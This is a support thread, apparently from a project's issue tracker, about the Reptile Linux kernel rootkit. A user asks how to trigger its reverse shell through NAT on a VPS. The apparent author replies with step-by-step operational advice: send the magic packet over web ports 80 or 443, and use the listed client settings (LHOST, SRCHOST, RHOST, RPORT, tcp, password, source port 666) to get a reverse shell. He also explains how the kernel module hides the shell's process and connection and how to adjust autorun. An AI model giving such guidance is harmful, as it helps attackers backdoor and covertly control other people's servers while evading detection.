Nat

[ModisDone]

Hi, thank you for this great project! As I read in other topic, it works only in internal network, but I really need it to use with my vps. How I can setup it to work through NAT? Anyone has experience about that? There is no problem with listener, but server can’t connect to me.

P.s ./reverse works fine. Probably something with magic packet, maybe I used it wrong? I run a web server on my vps, it’s possible to send a packet to Apache and trigger reverse connection?

[f0rb1dd3n]

As you aren't getting problems with the reversing connection, I will assume you are able to figure this part out.

So your only problem is the magic packet. You need to get sure how the firewall is working and doing the NAT redirect. Obviously ICMP won't work, because NAT normally doesn't forward those packets.

You have to figure out what port the firewall is routing to the target server, and send the magic packet on this port. I recommend you use SRCHOST equal to your LHOST, because you can get some trouble with src spoofing in some firewall rules.

Ex.: If the server is an webserver behind a firewall, you can send your magic packet through port 80 or 443 (tcp obviously) with srchost == lhost, and get your reverse shell in your VPS.

I hope I helped you.

[ModisDone]

So, when I did setup, I choosed default port 666, now I should change this to 80, right? How I can change it? Where is the config on server after installation?

[f0rb1dd3n]

The default port 666 is the source port, not the remote port. The reptile accepts magic packet on any tcp port you want, but the source porte has to be 666.

So, use the client to setup the packet for you in your VPS and do the configuration below:

set LHOST [your ip] set SRCHOST [your ip] set RHOST [target ip] set RPORT [target port] set PROT tcp set PASS [your pass chosen]

note: SRCPORT must keep 666.

and type run. It should be get your reverse shell.

[ModisDone]

It works! Thank you a lot! Next question, how to remove ./reverse from autorun and uninstall correctly?

[f0rb1dd3n]

1 - disable the file tampering feature with /reptile/reptile_cmd file-tampering 2 - comment the line of reptile_reverse in the file /reptile/reptile_start 3 - enable again the file tampering /reptile/reptile_cmd file-tampering

To uninstall reptile you only need to run setup.sh remove but you will have to reboot the system to complete the uninstallation.

[ModisDone]

When I installed first time with magic packet, I did not remove it, and installed again just reverse in root directory. Should I just remove /root/Reptile folder? Because reverse is run from /root/Reptile, not from /reptile/, or those commands that you wrote upper it’s important?

[f0rb1dd3n]

When you send the magic packet, the kernel module will run /reptile/reptile_reverse. So if you are running by hand in /root/Reptile, you can run by hand in /reptile too. So you can remove this /root/Reptile.

And there is another detail: /reptile/repitle_reverse is compiled to run with kernel module, so, it communicates with kernel module to hide its process and its connection. If you've compiled reverse in standalone version, it will works, but won't communicate with kernel module, in other words, is better use the /reptile/reptile_reverse when you already have the kernel module installed.